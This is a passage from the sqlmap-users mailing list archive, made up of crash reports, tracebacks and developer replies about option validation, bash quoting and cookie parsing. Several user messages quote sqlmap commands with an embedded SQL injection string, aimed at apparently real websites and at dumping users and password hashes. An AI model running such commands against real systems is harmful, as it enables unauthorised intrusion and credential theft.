> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 >



-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------
 
Message: 9
Date: Tue, 16 Apr 2013 14:33:33 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Sqlmap and direct connect error
 To: ???????? ?????? <vo...@s2...>
Cc: SqlMap List <sql...@li...>
 Message-ID:
	<CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
Content-Type: text/plain; charset="koi8-r"

Hi Vladimir.
 
Find it "patched" with the latest commit [1]. Basically, those combinations
should not be allowed (-d and --url; -d and --tor; etc.) and now we've
added new option validation checks for this kind of cases.
 
Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
 

On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:

> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
 > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
 > --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
 > sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
 > text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
 > Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
 > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
 >     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
 >     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", li...
 
[truncated message content]

Re: [sqlmap-users] sqlmap- error

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report. Please try to update to the latest revision and
run it again (use --fresh-queries just in case).

Kind regards,
Miroslav Stampar


On Sat, May 17, 2014 at 10:19 AM, Bob <sto...@qq...> wrote:

>
> Hi friends,
>
>    I have use sqlmap . with the latest version .
>
> it occur the problem .
>
> Could you can fix this for me?
>
> thanks
>
> best regards
>
> Robert
>
> [16:17:09] [CRITICAL] unhandled exception in sqlmap/1.0-dev-c181e90, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-c181e90
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap.py -u
> *******************************************************************  -p id
> --dbms=MySQL --risk=3 --level=5 -a
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 99, in main
>     start()
>   File
> "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/controller.py", line
> 585, in start
>     action()
>   File "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/action.py",
> line 130, in action
>     conf.dbmsHandler.dumpAll()
>   File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/entries.py",
> line 367, in dumpAll
>     self.getTables()
>   File
> "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line
> 215, in getTables
>     dbs = self.getDbs()
>   File
> "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line
> 175, in getDbs
>     kb.data.cachedDbs = list(set(kb.data.cachedDbs))
> TypeError: unhashable type: 'list'
>
> ------------------
>
>
>
>
> ------------------ 原始邮件 ------------------
> *发件人:* "Miroslav Stampar";<mir...@gm...>;
> *发送时间:* 2014年5月13日(星期二) 晚上9:40
> *收件人:* "Bob"<sto...@qq...>;
> *抄送:* "SqlMap List"<sql...@li...>;
> *主题:* Re: 回复： [sqlmap-users] sqlmap-user event not found error
>
> Hi Bob.
>
> It's a bash problem (reproduced it this moment). Using single quotes (')
> instead of double quotes (") should solve this issue.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote:
>
>>
>> Hi Miroslav,
>>
>>    Thanks for your email,
>>
>> but still the same after i tried  sqlmap  -u ".."
>>
>>
>>
>> sqlmap -u "
>> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa
>> "
>> bash: !search.do?keyword=: event not found
>>
>>
>> best regards
>> bob
>> ------------------
>>
>>
>>
>>
>> ------------------ 原始邮件 ------------------
>> *发件人:* "Miroslav Stampar";<mir...@gm...>;
>> *发送时间:* 2014年5月11日(星期天) 晚上10:38
>> *收件人:* "Bob"<sto...@qq...>;
>> *抄送:* "SqlMap List"<sql...@li...>;
>> *主题:* Re: [sqlmap-users] sqlmap-user event not found error
>>
>> Hi Bob.
>>
>> Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:
>>
>>> Hi friend,
>>>
>>>  I have problem with ! inside URL .
>>>
>>> /sqlmap.py -u
>>> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
>>> bash: !search.do?keyword=: event not found
>>>
>>> How should i do ?
>>>
>>> thanks
>>>
>>> bob
>>> ------------------
>>>
>>>
>>>
>>>
>>> ------------------ Original ------------------
>>> *From: * "Miroslav Stampar";<mir...@gm...>;
>>> *Date: * Fri, May 31, 2013 03:00 AM
>>> *To: * "Bob"<sto...@qq...>;
>>> *Cc: * "sqlmap-users"<sql...@li...>;
>>> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
>>>
>>> Hi.
>>> Have you been able to retrieve user names normally? I mean, were they
>>> normally been displayed in console output?
>>> Also, is boolean technique the only one detected by sqlmap in your case
>>> (or maybe UNION)?
>>>  Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
>>>
>>>> Hi friend,
>>>>
>>>>
>>>> Could you help me with this bug ?
>>>>
>>>>
>>>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
>>>> run with the latest development version from the GitHub repository. If the
>>>> exception persists, please send by e-mail to '
>>>> sql...@li...' or open a new issue at '
>>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> text and any information required to reproduce the bug. The developers will
>>>> try to reproduce the bug, fix it accordingly and get back to you.
>>>> sqlmap version: 1.0-dev
>>>> Python version: 2.7.3
>>>> Operating system: posix
>>>> Command line: ./sqlmap -u
>>>> ***********************************************
>>>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
>>>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
>>>> SQL Server --users --passwords
>>>> Technique: BOOLEAN
>>>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>>>> Traceback (most recent call last):
>>>> File "./sqlmap", line 87, in main
>>>> start()
>>>> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in
>>>> start
>>>> action()
>>>> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
>>>> conf.dbmsHandler.getPasswordHashes(), "password hash",
>>>> CONTENT_TYPE.PASSWORDS)
>>>> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
>>>> getPasswordHashes
>>>> if user in retrievedUsers:
>>>> TypeError: unhashable type: 'list'
>>>>
>>>> [*] shutting down at 22:54:12
>>>> Thanks
>>>>
>>>> BOB
>>>>
>>>>
>>>> ------------------ Original ------------------
>>>> *From: * "sqlmap-users-request"<
>>>> sql...@li...>;
>>>> *Date: * May 29, 2013
>>>> *To: * "sqlmap-users"<sql...@li...>;
>>>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>>>>
>>>> Send sqlmap-users mailing list submissions to
>>>> sql...@li...
>>>>
>>>> To subscribe or unsubscribe via the World Wide Web, visit
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> or, via email, send a message with subject or body 'help' to
>>>> sql...@li...
>>>>
>>>> You can reach the person managing the list at
>>>> sql...@li...
>>>>
>>>> When replying, please edit your Subject line so it is more specific
>>>> than "Re: Contents of sqlmap-users digest..."
>>>>
>>>>
>>>> Today's Topics:
>>>>
>>>> 1. Re: Feature request (David Guimaraes)
>>>> 2. Re: --load-cookies (Dirk Wetter)
>>>> 3. Re: --load-cookies (Miroslav Stampar)
>>>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>>>> (Miroslav Stampar)
>>>> 5. Re: --load-cookies (Dirk Wetter)
>>>> 6. --host parameter (co...@5i...)
>>>> 7. Sqlmap and direct connect error (???????? ??????)
>>>> 8. Re: --host parameter (Miroslav Stampar)
>>>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>>>> 10. feature request: offline mode for --dns-domain? (buawig)
>>>> 11. feature request: --dns-domain for non-root users (--dns-port)
>>>> (buawig)
>>>> 12. Domain credentials (Brian Milliron)
>>>> 13. Re: Domain credentials (Brandon Perry)
>>>> 14. Re: feature request: offline mode for --dns-domain?
>>>> (Miroslav Stampar)
>>>> 15. Re: Domain credentials (Miroslav Stampar)
>>>> 16. Re: feature request: fetch DNS queries from DNS server via
>>>> HTTP (buawig)
>>>> 17. Re: feature request: fetch DNS queries from DNS server via
>>>> HTTP (Miroslav Stampar)
>>>> 18. MySQL error based technique bug (Konrads Smelkovs)
>>>> 19. Re: MySQL error based technique bug (Miroslav Stampar)
>>>> 20. SQLmap crashing (Phillip Wylie)
>>>> 21. Re: SQLmap crashing (Miroslav Stampar)
>>>> 22. Custom injection payload in POST (Marcell Fodor)
>>>> 23. Re: SQLmap crashing (Miroslav Stampar)
>>>> 24. I got error on windows (warezhacking)
>>>> 25. Appending to a dump (Stephen Shkardoon)
>>>> 26. Re: Appending to a dump (Miroslav Stampar)
>>>> 27. Re: Appending to a dump (Stephen Shkardoon)
>>>> 28. Re: Appending to a dump (Miroslav Stampar)
>>>> 29. --ignore-404 ? (buawig)
>>>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>>> from 1 for 1) (buawig)
>>>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>>> from 1 for 1) (Miroslav Stampar)
>>>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>>> from 1 for 1) (Miroslav Stampar)
>>>> 33. Re: --ignore-404 ? (Miroslav Stampar)
>>>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>>>> 35. Re: BUG...!!!! o.O (Miroslav Stampar)
>>>> 36. gun...@gm... wants to follow you. Accept?
>>>> (gun...@gm...)
>>>> 37. Direct access to mysql database (Marcell Fodor)
>>>> 38. Re: Direct access to mysql database (Miroslav Stampar)
>>>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>>>> (Badoo)
>>>> 40. Not getting any sensitive data from database (Marcell Fodor)
>>>> 41. Re: Not getting any sensitive data from database
>>>> (Miroslav Stampar)
>>>> 42. unhandled exception (kvasilopoulos)
>>>> 43. [SQLMAP] Unhandled exception for IPv6
>>>> (e.n...@st...)
>>>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>>> 45. Re: unhandled exception (Miroslav Stampar)
>>>> 46. Passing SOAPAction in --header (Brandon Perry)
>>>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>>>> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>>> 49. Blind SQL Injection question (Guy Dufour)
>>>> 50. Re: Blind SQL Injection question (Chris Oakley)
>>>> 51. Re: Passing SOAPAction in --header (Brandon Perry)
>>>> 52. Re: Passing SOAPAction in --header (Brandon Perry)
>>>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Alok Kumar)
>>>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Brandon Perry)
>>>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Alok Kumar)
>>>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Brandon Perry)
>>>> 57. SQLMAP Bug (Joe O'Hara)
>>>> 58. Re: SQLMAP Bug (Miroslav Stampar)
>>>> 59. [CRITICAL] (Thai Thao)
>>>> 60. Re: [CRITICAL] (Miroslav Stampar)
>>>> 61. Providing multiple dbms (Sebastian Nerz)
>>>> 62. Re: Providing multiple dbms (Miroslav Stampar)
>>>>
>>>>
>>>> ----------------------------------------------------------------------
>>>>
>>>> Message: 1
>>>> Date: Sat, 13 Apr 2013 21:40:39 -0300
>>>> From: David Guimaraes <sk...@gm...>
>>>> Subject: Re: [sqlmap-users] Feature request
>>>> To: Miroslav Stampar <mir...@gm...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID:
>>>> <CAJ...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Good question Miroslav.. I tried to think in something that can be
>>>> implemented without ruin sqlmap query schema, but I could not come to
>>>> any
>>>> conclusion... =(
>>>>
>>>> The thing is, sqlsus use a different approch to dump the data, making
>>>> this
>>>> kind of thing possible...
>>>>
>>>> The solution that I found in this particular scenario is to use sqlsus,
>>>> unfortunately...
>>>>
>>>> Regards.
>>>>
>>>> David
>>>>
>>>>
>>>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
>>>> mir...@gm...
>>>> > wrote:
>>>>
>>>> > Hi David.
>>>> >
>>>> > And what do you recommend to be done in case of query with length >
>>>> > max_inj_length?
>>>> >
>>>> > Kind regards,
>>>> > Miroslav Stampar
>>>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>>>> >
>>>> >> Hi, I am trying to perform sql injection on a web site but I can not
>>>> get
>>>> >> successful due to a size limitation on the query sent to the server.
>>>> The
>>>> >> server is limiting the size of query in 512 bytes only and sqlmap do
>>>> not
>>>> >> have any customization that allows me to bypass this restriction like
>>>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
>>>> "autoconf"
>>>> >> that measure the permited query size.
>>>> >>
>>>> >> There is some chance to put this kind of feature in sqlmap?
>>>> >>
>>>> >> Thanks.
>>>> >>
>>>> >> --
>>>> >> David Gomes Guimar?es
>>>> >>
>>>> >>
>>>> >>
>>>> ------------------------------------------------------------------------------
>>>> >> Own the Future-Intel&reg; Level Up Game Demo Contest 2013
>>>> >> Rise to greatness in Intel's independent game demo contest.
>>>> >> Compete for recognition, cash, and the chance to get your game
>>>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>>>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>>>> >> _______________________________________________
>>>> >> sqlmap-users mailing list
>>>> >> sql...@li...
>>>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> >>
>>>> >>
>>>>
>>>>
>>>> --
>>>> David Gomes Guimar?es
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 2
>>>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>>>> From: Dirk Wetter <sp...@dr...>
>>>> Subject: Re: [sqlmap-users] --load-cookies
>>>> To: Miroslav Stampar <mir...@gm...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID: <516...@dr...>
>>>> Content-Type: text/plain; charset=ISO-8859-1
>>>>
>>>>
>>>>
>>>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>>> > Nevertheless, with the latest commit that check should be
>>>> "neutralized" now. Could you please retry it now?
>>>>
>>>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>>> hiccups, using the same file:
>>>>
>>>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>>> bug!
>>>> Traceback (most recent call last):
>>>> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>>> _really_load
>>>> assert domain_specified == initial_dot
>>>> AssertionError
>>>>
>>>> _warn_unhandled_exception()
>>>> [11:13:26] [CRITICAL] there was a problem loading cookies file
>>>> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>>
>>>> the 999.. looks strange to me.
>>>>
>>>> >
>>>> >
>>>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>>> mir...@gm... <mailto:mir...@gm...>> wrote:
>>>> >
>>>> > Hi Dirk.
>>>> >
>>>> > Well, I would say that you have an expired cookie. Do you see that
>>>> value 0? That value should be a valid UNIX time representing time of cookie
>>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>>> "[WARNING] cookie '....' has expired"
>>>> >
>>>>
>>>> that's true but IMO 0 represents just a session cookie. Example:
>>>>
>>>> prompt% wget -q -O /dev/null --keep-session-cookies
>>>> --save-cookies=/dev/stdout bing.com
>>>> # HTTP cookie file.
>>>> # Generated by Wget on 2013-04-15 11:23:13.
>>>> # Edit at your own risk.
>>>>
>>>> .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>>>> .bing.com TRUE / FALSE 1429089794 OrigMUID
>>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>>>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>>>> .bing.com TRUE / FALSE 0 _HOP
>>>> .bing.com TRUE / FALSE 0 _FS NU=1
>>>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>>> www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>>> www.bing.com FALSE / FALSE 1429089794 MUIDB
>>>> 333995A69E06630B2EB491169F016314
>>>>
>>>> prompt%
>>>>
>>>> Same parser problem btw if I edit the cookie file and put 1429089794
>>>> unix time instead of 0 in there.
>>>>
>>>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>>>> but cookies w/ expiration date) and uses the last
>>>> cookie only for the first 120 tries.
>>>>
>>>> Cheers, Dirk
>>>>
>>>>
>>>> >
>>>> > Kind regards,
>>>> > Miroslav Stampar
>>>> >
>>>> >
>>>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...>> wrote:
>>>> >
>>>> >
>>>> > Hi Miroslav,
>>>> >
>>>> > thx for your prompt answer.
>>>> >
>>>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>>> > > Hi Dirk.
>>>> > >
>>>> > > Could you please get the latest revision and retry it again?
>>>> > ed5599f: almost the same: with cookie in the header sqlmap takes only
>>>> this one.
>>>> > The slight difference seems to be that in the case where I didn't
>>>> supply a cookie
>>>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>>> server anymore.
>>>> > >
>>>> > > There was a situation where info messages have been wrongly written
>>>> that original response contained Set-Cookie in situations like yours.
>>>> > >
>>>> > > In case that everything stays as it is, I'll need to ask you to
>>>> provide more details. For example, cookie file would be great.
>>>> >
>>>> > sure, here you go:
>>>> >
>>>> > --snip
>>>> > # Netscape HTTP Cookie File
>>>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>>> > [..]
>>>> > --snap
>>>> >
>>>> > They are all session cookies. For easier reading here I put some
>>>> blanks in the line
>>>> > above, in "cookie-file" there aren't any though. Cookies were
>>>> generated with
>>>> > stompy and a shell script (looks he same as with
>>>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>>> <URL>)
>>>> >
>>>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>>>> >
>>>> > >
>>>> > > Also, please make sure that the cookie file contains proper
>>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>>> needs to have a proper valid time, etc.
>>>> >
>>>> > see above.
>>>> >
>>>> > Cheers,
>>>> >
>>>> > Dirk
>>>> >
>>>> > >
>>>> > >
>>>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>>> wrote:
>>>> > >
>>>> > > Hi Miroslav,
>>>> > >
>>>> > > yes unfortunately.
>>>> > >
>>>> > > If I omit the cookie line in the request header completely, sqlmap
>>>> > > seems to take the first cookie issued by the server with set-cookie
>>>> (and
>>>> > > put's it silently in).
>>>> > >
>>>> > > Cheers,
>>>> > >
>>>> > > Dirk
>>>> > >
>>>> > >
>>>> > >
>>>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>>> > > > Hi.
>>>> > > >
>>>> > > > And this is also happening if you are skipping "Cookie:
>>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>>> > > >
>>>> > > > Kind regards,
>>>> > > > Miroslav Stampar
>>>> > > >
>>>> > > >
>>>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>>> > > >
>>>> > > >
>>>> > > > Hi folks,
>>>> > > >
>>>> > > > .... that doesn't work for me. It always uses the cookie supplied
>>>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>>> > > > from the 1st server reply is being used)
>>>> > > >
>>>> > > > So what is wrong in here:
>>>> > > >
>>>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>>> > > > --level=2 --risk=2 -r $REQUEST
>>>> > > >
>>>> > > > The content of the file $REQUEST is:
>>>> > > >
>>>> > > > POST <URL> HTTP/1.1
>>>> > > > Host: <HOST>
>>>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>>> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>>> http://0.2.149.6> Safari/525.13
>>>> > > > Accept:
>>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>>> > > > Accept-Language: en-US,en;q=0.5
>>>> > > > Accept-Encoding: gzip, deflate
>>>> > > > Referer: <Referer>
>>>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>>> > > > Connection: keep-alive
>>>> > > > Content-Type: application/x-www-form-urlencoded
>>>> > > > Content-Length: 67
>>>> > > >
>>>> > > > <abunchofpostparams>
>>>> > > >
>>>> > > >
>>>> > > > No hints that cookie-file is not in correct format (I've been
>>>> through this,
>>>> > > > at least I think I so ;) ).
>>>> > > >
>>>> > > > Any insight would be much appreciated.
>>>> > > >
>>>> > > >
>>>> > > > Cheers,
>>>> > > >
>>>> > > > Dirk
>>>> > > >
>>>> > > >
>>>> > > >
>>>> ------------------------------------------------------------------------------
>>>> > > > Precog is a next-generation analytics platform capable of advanced
>>>> > > > analytics on semi-structured data. The platform includes APIs for
>>>> building
>>>> > > > apps and a phenomenal toolset for data science. Developers can use
>>>> > > > our toolset for easy data analysis & visualization. Get a free
>>>> account!
>>>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > > > _______________________________________________
>>>> > > > sqlmap-users mailing list
>>>> > > > sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>>>
>>>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > --
>>>> > > > Miroslav Stampar
>>>> > > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> >
>>>> >
>>>> >
>>>> >
>>>> > --
>>>> > Miroslav Stampar
>>>> > http://about.me/stamparm
>>>> >
>>>> >
>>>> >
>>>> >
>>>> > --
>>>> > Miroslav Stampar
>>>> > http://about.me/stamparm
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 3
>>>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] --load-cookies
>>>> To: Dirk Wetter <sp...@dr...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID:
>>>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Hi Dirk.
>>>>
>>>> Now that crash should be "patched".
>>>>
>>>> Could you please retry it now and say if the latest revision suits your
>>>> needs?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>>
>>>> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...>
>>>> wrote:
>>>>
>>>> >
>>>> >
>>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>>> > > Nevertheless, with the latest commit that check should be
>>>> "neutralized"
>>>> > now. Could you please retry it now?
>>>> >
>>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>>> > hiccups, using the same file:
>>>> >
>>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>>> bug!
>>>> > Traceback (most recent call last):
>>>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>>> > _really_load
>>>> > assert domain_specified == initial_dot
>>>> > AssertionError
>>>> >
>>>> > _warn_unhandled_exception()
>>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>>>> ('invalid
>>>> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>>> >
>>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>> >
>>>> > the 999.. looks strange to me.
>>>> >
>>>> > >
>>>> > >
>>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>>> > mir...@gm... <mailto:mir...@gm...>>
>>>> wrote:
>>>> > >
>>>> > > Hi Dirk.
>>>> > >
>>>> > > Well, I would say that you have an expired cookie. Do you see that
>>>> > value 0? That value should be a valid UNIX time representing time of
>>>> cookie
>>>> > expiration. Also, I've just tested that cookie of yours and sqlmap
>>>> says:
>>>> > "[WARNING] cookie '....' has expired"
>>>> > >
>>>> >
>>>> > that's true but IMO 0 represents just a session cookie. Example:
>>>> >
>>>> > prompt% wget -q -O /dev/null --keep-session-cookies
>>>> > --save-cookies=/dev/stdout bing.com
>>>> > # HTTP cookie file.
>>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>>> > # Edit at your own risk.
>>>> >
>>>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR
